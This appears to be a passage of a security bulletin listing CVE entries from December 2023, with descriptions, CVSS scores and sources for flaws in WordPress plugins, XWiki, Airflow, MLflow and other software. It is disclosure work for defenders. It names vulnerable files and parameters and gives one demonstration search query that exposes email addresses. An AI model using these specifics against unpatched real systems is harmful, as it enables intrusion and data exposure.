| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in David Vongries Ultimate Dashboard - Custom WordPress Dashboard allows Stored XSS. This issue affects Ultimate Dashboard - Custom WordPress Dashboard: from n/a through 3.7.11. | 2023-12-21 | 5.9 | CVE-2023-50828 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Aerin Loan Repayment Calculator and Application Form allows Stored XSS. This issue affects Loan Repayment Calculator and Application Form: from n/a through 2.9.3. | 2023-12-21 | 5.9 | CVE-2023-50829 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Seosbg Seos Contact Form allows Stored XSS. This issue affects Seos Contact Form: from n/a through 1.8.0. | 2023-12-21 | 5.9 | CVE-2023-50830 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mondula GmbH Multi Step Form allows Stored XSS. This issue affects Multi Step Form: from n/a through 1.7.13. | 2023-12-21 | 5.9 | CVE-2023-50832 (audit@patchstack.com) |
| wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Praveen Goswami Advanced Category Template. This issue affects Advanced Category Template: from n/a through 0.1. | 2023-12-19 | 5.4 | CVE-2023-50835 (audit@patchstack.com) |
| wordpress -- wordpress | The Image horizontal reel scroll slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'ihrss-gallery' shortcode in versions up to, and including, 13.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2023-12-19 | 5.4 | CVE-2023-5413 (security@wordfence.com) |
| wordpress -- wordpress | The Jquery news ticker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'jquery-news-ticker' shortcode in versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2023-12-19 | 5.4 | CVE-2023-5432 (security@wordfence.com) |
| wordpress -- wordpress | The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code | 2023-12-18 | 5.3 | CVE-2023-6065 (contact@wpscan.com) |
| wordpress -- wordpress | The WP Shortcodes Plugin - Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'su_button', 'su_members', and 'su_tabs' shortcodes in all versions up to, and including, 7.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2023-12-19 | 5.4 | CVE-2023-6488 (security@wordfence.com) |
| wordpress -- wordpress | Authorization Bypass Through User-Controlled Key vulnerability in XWP Stream. This issue affects Stream: from n/a through 3.9.2. | 2023-12-19 | 4.3 | CVE-2022-43450 (audit@patchstack.com) |
| wordpress -- wordpress | Deserialization of Untrusted Data vulnerability in weDevs Dokan - Best WooCommerce Multivendor Marketplace Solution - Build Your Own Amazon, eBay, Etsy. This issue affects Dokan - Best WooCommerce Multivendor Marketplace Solution - Build Your Own Amazon, eBay, Etsy: from n/a through 3.7.19. | 2023-12-19 | 4.4 | CVE-2023-34382 (audit@patchstack.com) |
| wordpress -- wordpress | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Parcel Pro. This issue affects Parcel Pro: from n/a through 1.6.11. | 2023-12-19 | 4.7 | CVE-2023-46624 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ternstyle LLC Automatic Youtube Video Posts Plugin allows Stored XSS. This issue affects Automatic Youtube Video Posts Plugin: from n/a through 5.2.2. | 2023-12-15 | 4.8 | CVE-2023-49180 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ZealousWeb Track Geolocation Of Users Using Contact Form 7 allows Stored XSS. This issue affects Track Geolocation Of Users Using Contact Form 7: from n/a through 1.4. | 2023-12-15 | 4.8 | CVE-2023-49188 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Getsocial, S.A. Social Share Buttons & Analytics Plugin - GetSocial.Io allows Stored XSS. This issue affects Social Share Buttons & Analytics Plugin - GetSocial.Io: from n/a through 4.3.12. | 2023-12-15 | 4.8 | CVE-2023-49189 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chandra Shekhar Sahu Site Offline Or Coming Soon Or Maintenance Mode allows Stored XSS. This issue affects Site Offline Or Coming Soon Or Maintenance Mode: from n/a through 1.5.6. | 2023-12-15 | 4.8 | CVE-2023-49190 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Supsystic GDPR Cookie Consent by Supsystic allows Stored XSS. This issue affects GDPR Cookie Consent by Supsystic: from n/a through 2.1.2. | 2023-12-15 | 4.8 | CVE-2023-49191 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Biteship Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo allows Stored XSS. This issue affects Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo: from n/a through 2.2.24. | 2023-12-15 | 4.8 | CVE-2023-49767 (audit@patchstack.com) |
| wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themeum Tutor LMS - eLearning and online course solution allows Stored XSS. This issue affects Tutor LMS - eLearning and online course solution: from n/a through 2.2.4. | 2023-12-15 | 4.8 | CVE-2023-49829 (audit@patchstack.com) |
| wordpress -- wordpress | The Autocomplete Location field Contact Form 7 WordPress plugin before 3.0, autocomplete-location-field-contact-form-7-pro WordPress plugin before 2.0 does not sanitize and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) | 2023-12-18 | 4.8 | CVE-2023-5005 (contact@wpscan.com) |
| wordpress -- wordpress | The Swift Performance Lite WordPress plugin before 2.3.6.15 does not prevent users from exporting the plugin's settings, which may include sensitive information such as Cloudflare API tokens. | 2023-12-18 | 4.3 | CVE-2023-6289 (contact@wpscan.com) |
| wordpress -- wordpress | Authorization Bypass Through User-Controlled Key vulnerability in Blaz K. Rate my Post - WP Rating System. This issue affects Rate my Post - WP Rating System: from n/a through 3.4.1. | 2023-12-21 | 4.3 | CVE-2023-49765 (audit@patchstack.com) |
| wso2 -- api_manager | Due to improper error handling, a REST API resource could expose a server side error containing an internal WSO2 specific package name in the HTTP response. | 2023-12-15 | 5.3 | CVE-2023-6839 (ed10eef1-636d-4fbe-9993-6890dfa878f8) |
| wso2 -- api_manager/iot_server | Multiple WSO2 products have been identified as vulnerable due to lack of server-side input validation in the Forum feature, API rating could be manipulated. | 2023-12-15 | 4.3 | CVE-2023-6835 (ed10eef1-636d-4fbe-9993-6890dfa878f8) |
| wso2 -- multiple_products | Reflected XSS vulnerability can be exploited by tampering a request parameter in Authentication Endpoint. This can be performed in both authenticated and unauthenticated requests. | 2023-12-15 | 6.1 | CVE-2023-6838 (ed10eef1-636d-4fbe-9993-6890dfa878f8) |
| wso2 -- multiple_products | Multiple WSO2 products have been identified as vulnerable due to improper output encoding, a Stored Cross Site Scripting (XSS) attack can be carried out by an attacker injecting a malicious payload into the Registry feature of the Management Console. | 2023-12-18 | 4.8 | CVE-2023-6911 (ed10eef1-636d-4fbe-9993-6890dfa878f8) |
| xwiki -- xwiki | XWiki Platform is a generic wiki platform. Prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for `objcontent:email*` using XWiki's regular search interface. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1 by not indexing email address properties when obfuscation is enabled. There are no known workarounds for this vulnerability. | 2023-12-15 | 5.3 | CVE-2023-50720 (security-advisories@github.com) |
| yiisoft -- yii2-authclient | yii2-authclient is an extension that adds OpenID, OAuth, OAuth2 and OpenId Connect consumers for the Yii framework 2.0. In yii2-authclient prior to version 2.2.15, the Oauth1/2 `state` and OpenID Connect `nonce` is vulnerable for a `timing attack` since it is compared via regular string comparison (instead of `Yii::$app->getSecurity()->compareString()`). Version 2.2.15 contains a patch for the issue. No known workarounds are available. | 2023-12-22 | 6.1 | CVE-2023-50708 (security-advisories@github.com) |
| yiisoft -- yii2-authclient | yii2-authclient is an extension that adds OpenID, OAuth, OAuth2 and OpenId Connect consumers for the Yii framework 2.0. In yii2-authclient prior to version 2.2.15, the Oauth2 PKCE implementation is vulnerable in 2 ways. First, the `authCodeVerifier` should be removed after usage (similar to `authState`). Second, there is a risk for a `downgrade attack` if PKCE is being relied on for CSRF protection. Version 2.2.15 contains a patch for the issue. No known workarounds are available. | 2023-12-22 | 6.8 | CVE-2023-50714 (security-advisories@github.com) |


Low Vulnerabilities

| Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info |
|---|---|---|---|---|
| adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Input Validation vulnerability. A low-privileged attacker could leverage this vulnerability to achieve a low-integrity impact within the application. Exploitation of this issue requires user interaction. | 2023-12-15 | 3.5 | CVE-2023-48608 (psirt@adobe.com) |
| automad -- automad | A vulnerability was found in automad up to 1.10.9 and classified as problematic. Affected by this issue is some unknown functionality of the file packages\standard\templates\post.php of the component Setting Handler. The manipulation of the argument sitename leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248684. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-21 | 2.4 | CVE-2023-7035 (cna@vuldb.com) |
| code-projects -- faculty_management_system | A vulnerability, which was classified as problematic, has been found in code-projects Faculty Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/pages/yearlevel.php. The manipulation of the argument Year Level/Section leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248744. | 2023-12-22 | 3.5 | CVE-2023-7057 (cna@vuldb.com) |
| code-projects -- faculty_management_system | A vulnerability classified as problematic was found in code-projects Faculty Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/pages/subjects.php. The manipulation of the argument Description/Units leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248743. | 2023-12-22 | 2.4 | CVE-2023-7056 (cna@vuldb.com) |
| code-projects -- point_of_sales_and_inventory_management_system | A vulnerability was found in code-projects Point of Sales and Inventory Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /main/checkout.php. The manipulation of the argument pt leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248846 is the identifier assigned to this vulnerability. | 2023-12-22 | 3.5 | CVE-2023-7075 (cna@vuldb.com) |
| enterprise_server -- enterprise_server | A race condition in GitHub Enterprise Server allowed an existing admin to maintain permissions on transferred repositories by making a GraphQL mutation to alter repository permissions during the transfer. This vulnerability affected GitHub Enterprise Server version 3.8.0 and above and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. | 2023-12-21 | 3.9 | CVE-2023-6690 (product-cna@github.com) |
| enterprise_server -- enterprise_server | An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed issue comments to be read with an improperly scoped token. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. | 2023-12-21 | 2.7 | CVE-2023-51380 (product-cna@github.com) |
| gallagher -- controller_6000 | Sensitive information uncleared after debug/power state transition in the Controller 6000 could be abused by an attacker with knowledge of the Controller's default diagnostic password and physical access to the Controller to view its configuration through the diagnostic web pages. This issue affects: Gallagher Controller 6000 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), v8.60 or earlier. | 2023-12-18 | 2.4 | CVE-2023-41967 (disclosures@gallagher.com) |
| gallagher -- multiple_products | Improper input validation of a large HTTP request in the Controller 6000 and Controller 7000 optional diagnostic web interface (Port 80) can be used to perform a Denial of Service of the diagnostic web interface. This issue affects: Gallagher Controller 6000 and 7000 8.90 prior to vCR8.90.231204a (distributed in 8.90.1620 (MR2)), 8.80 prior to vCR8.80.231204a (distributed in 8.80.1369 (MR3)), 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior. | 2023-12-18 | 3.1 | CVE-2023-22439 (disclosures@gallagher.com) |
| gitlab -- gitlab | An issue has been discovered in GitLab EE affecting all versions starting from 8.17 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible for auditor users to fork and submit merge requests to private projects they're not a member of. | 2023-12-15 | 3.5 | CVE-2023-3511 (cve@gitlab.com) |
| keycloak -- keycloak | Keycloak's device authorization grant does not correctly validate the device code and client ID. An attacker client could abuse the missing validation to spoof a client consent request and trick an authorization admin into granting consent to a malicious OAuth client or possible unauthorized access to an existing OAuth client. | 2023-12-21 | 3.5 | CVE-2023-2585 (secalert@redhat.com) |
| libssh -- libssh | A flaw was found in the libssh implements abstract layer for message digest (MD) operations implemented by different supported crypto backends. The return values from these were not properly checked, which could cause low-memory situations failures, NULL dereferences, crashes, or usage of the uninitialized memory as an input for the KDF. In this case, non-matching keys will result in decryption/integrity failures, terminating the connection. | 2023-12-19 | 3.7 | CVE-2023-6918 (secalert@redhat.com) |
| nautobot -- nautobot | Nautobot is a Network Source of Truth and Network Automation Platform built as a web application atop the Django Python framework with a PostgreSQL or MySQL database. When submitting a Job to run via a Job Button, only the model-level `extras.run_job` permission is checked (i.e., does the user have permission to run Jobs in general). Object-level permissions (i.e., does the user have permission to run this specific Job?) are not enforced by the URL/view used in this case. A user with permissions to run even a single Job can actually run all configured JobButton Jobs. Fix will be available in Nautobot 1.6.8 and 2.1.0 | 2023-12-22 | 3.5 | CVE-2023-51649 (security-advisories@github.com) |
| nextcloud -- security-advisories | Nextcloud/Cloud is a calendar app for Nextcloud. An attacker can gain access to stacktrace and internal paths of the server when generating an exception while editing a calendar appointment. It is recommended that the Nextcloud Calendar app is upgraded to 4.5.3 | 2023-12-22 | 3.5 | CVE-2023-48308 (security-advisories@github.com) |
| phpgurukul -- online_notes_sharing_system | A vulnerability has been found in PHPGurukul Online Notes Sharing System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file user/profile.php. The manipulation of the argument name/email leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248737 was assigned to this vulnerability. | 2023-12-21 | 3.5 | CVE-2023-7050 (cna@vuldb.com) |
| phpgurukul -- online_notes_sharing_system | A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /user/signup.php. The manipulation leads to weak password requirements. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248740. | 2023-12-22 | 3.1 | CVE-2023-7053 (cna@vuldb.com) |
| slawkens -- myaac | A vulnerability was found in slawkens MyAAC up to 0.8.13. It has been declared as problematic. This vulnerability affects unknown code of the file system/pages/bugtracker.php. The manipulation of the argument bug[2]['subject']/bug[2]['text']/report['subject'] leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 0.8.14 is able to address this issue. The name of the patch is 83a91ec540072d319dd338abff45f8d5ebf48190. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248848. | 2023-12-22 | 3.5 | CVE-2023-7076 (cna@vuldb.com) |
| sourcecodester -- online_student_management_system | A vulnerability has been found in SourceCodester Online Student Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file edit-student-detail.php. The manipulation of the argument notmsg leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248377 was assigned to this vulnerability. | 2023-12-19 | 2.4 | CVE-2023-6945 (cna@vuldb.com) |
| sourcecodester -- school_visitor_log_e-book | A vulnerability was found in SourceCodester School Visitor Log e-Book 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file log-book.php. The manipulation of the argument Full Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248750 is the identifier assigned to this vulnerability. | 2023-12-22 | 3.5 | CVE-2023-7059 (cna@vuldb.com) |
| w3c -- online-spellchecker-py | A vulnerability was found in w3c online-spellchecker-py up to 20140130. It has been rated as problematic. This issue affects some unknown processing of the file spellchecker. The manipulation leads to cross site scripting. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The identifier of the patch is d6c21fd8187c5db2a50425ff80694149e75d722e. It is recommended to apply a patch to fix this issue. The identifier VDB-248849 was assigned to this vulnerability. | 2023-12-23 | 3.1 | CVE-2014-125108 (cna@vuldb.com) |
| wordpress -- wordpress | Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Ricard Torres Thumbs Rating. This issue affects Thumbs Rating: from n/a through 5.0.0. | 2023-12-19 | 3.7 | CVE-2022-45809 (audit@patchstack.com) |
| wordpress -- wordpress | Authorization Bypass Through User-Controlled Key vulnerability in gVectors Team Comments - wpDiscuz. This issue affects Comments - wpDiscuz: from n/a through 7.6.3. | 2023-12-20 | 2.7 | CVE-2023-46311 (audit@patchstack.com) |


Severity Not Yet Assigned

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
apache -- airflowApache Airflow, versions 2.6.0 through 2.7.3 has a stored XSS vulnerability that allows a DAG author to add an unbounded and not-sanitized javascript in the parameter description field of the DAG. This Javascript can be executed on the client side of any of the user who looks at the tasks in the browser sandbox. While this issue does not allow to exit the browser sandbox or manipulation of the server-side data - more than the DAG author already has, it allows to modify what the user looking at the DAG details sees in the browser - which opens up all kinds of possibilities of misleading other users. Users of Apache Airflow are recommended to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability2023-12-21not yet calculatedCVE-2023-47265
security@apache.org
security@apache.org
security@apache.org
apache -- airflowApache Airflow, in versions prior to 2.8.0, contains a security vulnerability that allows an authenticated user with limited access to some DAGs, to craft a request that could give the user write access to various DAG resources for DAGs that the user had no access to, thus, enabling the user to clear DAGs they shouldn't. This is a missing fix for CVE-2023-42792 in Apache Airflow 2.7.2  Users of Apache Airflow are strongly advised to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability.2023-12-21not yet calculatedCVE-2023-48291
security@apache.org
apache -- airflowApache Airflow, version 2.7.0 through 2.7.3, has a vulnerability that allows an attacker to trigger a DAG in a GET request without CSRF validation. As a result, it was possible for a malicious website opened in the same browser - by the user who also had Airflow UI opened - to trigger the execution of DAGs without the user's consent. Users are advised to upgrade to version 2.8.0 or later, which is not affected.2023-12-21not yet calculatedCVE-2023-49920
security@apache.org
apache -- iotdbDeserialization of Untrusted Data vulnerability in Apache IoTDB. This issue affects Apache IoTDB: from 0.13.0 through 0.13.4. Users are recommended to upgrade to version 1.2.2, which fixes the issue.2023-12-21not yet calculatedCVE-2023-51656
security@apache.org
apache -- airflowApache Airflow, versions before 2.8.0, is affected by a vulnerability that allows an authenticated user without the variable edit permission to update a variable. This flaw compromises the integrity of variable management, potentially leading to unauthorized data modification. Users are recommended to upgrade to 2.8.0, which fixes this issue.2023-12-21not yet calculatedCVE-2023-50783
security@apache.org
apple -- macosA session rendering issue was addressed with improved session tracking. This issue is fixed in macOS Sonoma 14.2.1. A user who shares their screen may unintentionally share the incorrect content.2023-12-19not yet calculatedCVE-2023-42940
product-security@apple.com
array -- arrayos_agMotionPro in Array ArrayOS AG before 9.4.0.505 on AG and vxAG allows remote command execution via crafted packets. AG and vxAG 9.3.0.259.x are unaffected.2023-12-22not yet calculatedCVE-2023-51707
cve@mitre.org
assetwise_integrity_information_server -- assetwise_integrity_information_serverBentley eB System Management Console applications within Assetwise Integrity Information Server allow an unauthenticated user to view configuration options via a crafted request, leading to information disclosure. This affects eB System management Console before 23.00.02.03 and Assetwise ALIM For Transportation before 23.00.01.25.2023-12-22not yet calculatedCVE-2023-51708
cve@mitre.org
bcoin-org -- bcoinAn issue was discovered in bcoin-org bcoin version 2.2.0, allows remote attackers to obtain sensitive information via weak hashing algorithms in the component \vendor\faye-websocket.js.2023-12-21not yet calculatedCVE-2023-50475
cve@mitre.org
blinksocks -- blinksocksAn issue was discovered in blinksocks version 3.3.8, allows remote attackers to obtain sensitive information via weak encryption algorithms in the component /presets/ssr-auth-chain.js.2023-12-21not yet calculatedCVE-2023-50481
cve@mitre.org
buildkite -- elastic_ci_for_awsA symbolic link following vulnerability in Buildkite Elastic CI for AWS versions prior to 6.7.1 and 5.22.5 allows the buildkite-agent user to change ownership of arbitrary directories via the PIPELINE_PATH variable in the fix-buildkite-agent-builds-permissions script.2023-12-22not yet calculatedCVE-2023-43116
cve@mitre.org
buildkite -- elastic_ci_for_awsA time-of-check-time-of-use race condition vulnerability in Buildkite Elastic CI for AWS versions prior to 6.7.1 and 5.22.5 allows the buildkite-agent user to bypass a symbolic link check for the PIPELINE_PATH variable in the fix-buildkite-agent-builds-permissions script.2023-12-22not yet calculatedCVE-2023-43741
cve@mitre.org
cacti -- cactiReflected Cross Site Scripting (XSS) vulnerability in Cacti v1.2.25, allows remote attackers to escalate privileges when uploading an xml template file via templates_import.php.2023-12-22not yet calculatedCVE-2023-50569
cve@mitre.org
cams_biometrics -- multiple_productsSQL injection vulnerability in Cams Biometrics Zkteco, eSSL, Cams Biometrics Integration Module with HR Attendance (aka odoo-biometric-attendance) v. 13.0 through 16.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the db parameter in the controllers/controllers.py component.2023-12-15not yet calculatedCVE-2023-48050
cve@mitre.org
cesanta -- mjsBuffer Overflow vulnerability in Cesanta MJS version 2.22.0 allows attackers to execute arbitrary code, cause a denial of service (DoS), and obtain sensitive information via a segmentation fault that can occur in getprop_builtin_foreign when the input string includes the name of a built-in API.2023-12-20not yet calculatedCVE-2023-50044
cve@mitre.org
cryptopp --  cryptoppCrypto++ (aka cryptopp) through 8.9.0 has a Marvin side channel during decryption with PKCS#1 v1.5 padding.2023-12-18not yet calculatedCVE-2023-50979
cve@mitre.org
cryptopp --  cryptoppgf2n.cpp in Crypto++ (aka cryptopp) through 8.9.0 allows attackers to cause a denial of service (application crash) via DER public-key data for an F(2^m) curve, if the degree of each term in the polynomial is not strictly decreasing.2023-12-18not yet calculatedCVE-2023-50980
cve@mitre.org
cryptopp --  cryptoppModularSquareRoot in Crypto++ (aka cryptopp) through 8.9.0 allows attackers to cause a denial of service (infinite loop) via crafted DER public-key data associated with squared odd numbers, such as the square of 268995137513890432434389773128616504853.2023-12-18not yet calculatedCVE-2023-50981
cve@mitre.org
cuppacms -- cuppacmsSQL Injection vulnerability in components/table_manager/html/edit_admin_table.php in CuppaCMS V1.0 allows attackers to run arbitrary SQL commands via the table parameter.2023-12-20not yet calculatedCVE-2023-47990
cve@mitre.org
devolutions -- remote_desktop_managerInadequate validation of permissions when employing remote tools and macros via the context menu within Devolutions Remote Desktop Manager versions 2023.3.31 and earlier permits a user to initiate a connection without proper execution rights via the remote tools feature. This affects only SQL data sources.2023-12-21not yet calculatedCVE-2023-7047
security@devolutions.net
filerun -- filerunFileRun 20220519 allows SQL Injection via the "dir" parameter in a /?module=users&section=cpanel&page=list request.2023-12-22not yet calculatedCVE-2022-47532
cve@mitre.org
free5gc -- free5gcAn issue was discovered in free5GC version 3.3.0, allows remote attackers to execute arbitrary code and cause a denial of service (DoS) on AMF component via crafted NGAP message.2023-12-22not yet calculatedCVE-2023-49391
cve@mitre.org
google -- chromeInsufficient policy enforcement in ADB in Google Chrome on ChromeOS prior to 114.0.5735.90 allowed a local attacker to bypass device policy restrictions via physical access to the device. (Chromium security severity: High)2023-12-20not yet calculatedCVE-2023-3742
chrome-cve-admin@google.com
google -- chromeHeap buffer overflow in WebRTC in Google Chrome prior to 120.0.6099.129 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)2023-12-21not yet calculatedCVE-2023-7024
chrome-cve-admin@google.com
heimdal -- thor_agentAn issue was discovered in Heimdal Thor agent versions 3.4.2 and before on Windows and 2.6.9 and before on macOS, allows attackers to bypass network filtering, execute arbitrary code, and obtain sensitive information via DarkLayer Guard threat prevention module.2023-12-21not yet calculatedCVE-2023-29485
cve@mitre.org
heimdal -- thor_agentAn issue was discovered in Heimdal Thor agent versions 3.4.2 and before 3.7.0 on Windows, allows attackers to bypass USB access restrictions, execute arbitrary code, and obtain sensitive information via Next-Gen Antivirus component.2023-12-21not yet calculatedCVE-2023-29486
cve@mitre.org
heimdal -- thor_agentAn issue was discovered in Heimdal Thor agent versions 3.4.2 and before on Windows and 2.6.9 and before on macOS, allows attackers to cause a denial of service (DoS) via the Threat To Process Correlation threat prevention module.2023-12-21not yet calculatedCVE-2023-29487
cve@mitre.org
huggingface -- transformersDeserialization of Untrusted Data in GitHub repository huggingface/transformers prior to 4.36.2023-12-19not yet calculatedCVE-2023-6730
security@huntr.dev
huggingface -- transformersDeserialization of Untrusted Data in GitHub repository huggingface/transformers prior to 4.36.2023-12-20not yet calculatedCVE-2023-7018
security@huntr.dev
ivanti -- avalancheAn attacker can send a specially crafted request which could lead to leakage of sensitive data or potentially a resource-based DoS attack.2023-12-19not yet calculatedCVE-2021-22962
support@hackerone.com
ivanti -- avalancheAn unauthenticated attacker could send a specifically crafted web request causing a Server-Side Request Forgery (SSRF) in Ivanti Avalanche Remote Control server.2023-12-19not yet calculatedCVE-2023-46262
support@hackerone.com
ivanti -- avalancheAn attacker can send a specially crafted request which could lead to leakage of sensitive data or potentially a resource-based DoS attack.2023-12-19not yet calculatedCVE-2023-46266
support@hackerone.com
libming -- libmingBuffer Overflow vulnerability in libming version 0.4.8, allows attackers to execute arbitrary code and obtain sensitive information via parser.c component.2023-12-20not yet calculatedCVE-2023-50628
cve@mitre.org
linotp -- linotpDefective request context handling in Self Service in LinOTP 3.x before 3.2.5 allows remote unauthenticated attackers to escalate privileges, thereby allowing them to act as and with the permissions of another user. Attackers must generate repeated API requests to trigger a race condition with concurrent user activity in the self-service portal.2023-12-19not yet calculatedCVE-2023-49706
cve@mitre.org
lockss-daemon -- lockss-daemonlockss-daemon (aka Classic LOCKSS Daemon) before 1.77.3 performs post-Unicode normalization, which may allow bypass of intended access restrictions, such as when U+1FEF is converted to a backtick.2023-12-15not yet calculatedCVE-2023-42183
cve@mitre.org
ltb_self_service_password -- ltb_self_service_passwordAn issue in LTB Self Service Password before v.1.5.4 allows a remote attacker to execute arbitrary code and obtain sensitive information via hijack of the SMS verification code function to arbitrary phone.2023-12-21not yet calculatedCVE-2023-49032
cve@mitre.org
mediawiki -- mediawikiAn issue was discovered in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. In includes/logging/RightsLogFormatter.php, group-*-member messages can result in XSS on Special:log/rights.2023-12-22not yet calculatedCVE-2023-51704
cve@mitre.org
mlflow -- mlflowWith only one user interaction (download a malicious config), attackers can gain full command execution on the victim system.2023-12-19not yet calculatedCVE-2023-6940
security@huntr.dev
mlflow -- mlflowA malicious user could use this issue to access internal HTTP(s) servers, and in the worst case (i.e., an AWS instance) it could be abused to get remote code execution on the victim machine.2023-12-20not yet calculatedCVE-2023-6974
security@huntr.dev
mlflow -- mlflowA malicious user could use this issue to get command execution on the vulnerable machine and get access to data & models information.2023-12-20not yet calculatedCVE-2023-6975
security@huntr.dev
mlflow -- mlflowThis vulnerability is capable of writing arbitrary files into arbitrary locations on the remote filesystem in the context of the server process.2023-12-20not yet calculatedCVE-2023-6976
security@huntr.dev
mlflow -- mlflowThis vulnerability enables malicious users to read sensitive files on the server.2023-12-20not yet calculatedCVE-2023-6977
security@huntr.dev
mp3gain -- mp3gainA stack buffer overflow vulnerability in MP3Gain v1.6.2 allows an attacker to cause a denial of service via the WriteMP3GainAPETag function at apetag.c:592.2023-12-22not yet calculatedCVE-2023-49356
cve@mitre.org
multiple_vendors -- multiple_productsMatrix SSL 4.x through 4.6.0 and Rambus TLS Toolkit have a length-subtraction integer overflow for Client Hello Pre-Shared Key extension parsing in the TLS 1.3 server. An attacked device calculates an SHA-2 hash over at least 65 KB (in RAM). With a large number of crafted TLS messages, the CPU becomes heavily loaded. This occurs in tls13VerifyBinder and tls13TranscriptHashUpdate.2023-12-22not yet calculatedCVE-2023-24609
cve@mitre.org
nintendo -- dsDS Wireless Communication (DWC) with DWC_VERSION_3 and DWC_VERSION_11 allows remote attackers to execute arbitrary code on a game-playing client's machine via a modified GPCM message.2023-12-20not yet calculatedCVE-2023-45887
cve@mitre.org
nos_client -- nos_clientAn issue was discovered in nos client version 0.6.6, allows remote attackers to escalate privileges via getRPCEndpoint.js.2023-12-21not yet calculatedCVE-2023-50477
cve@mitre.org
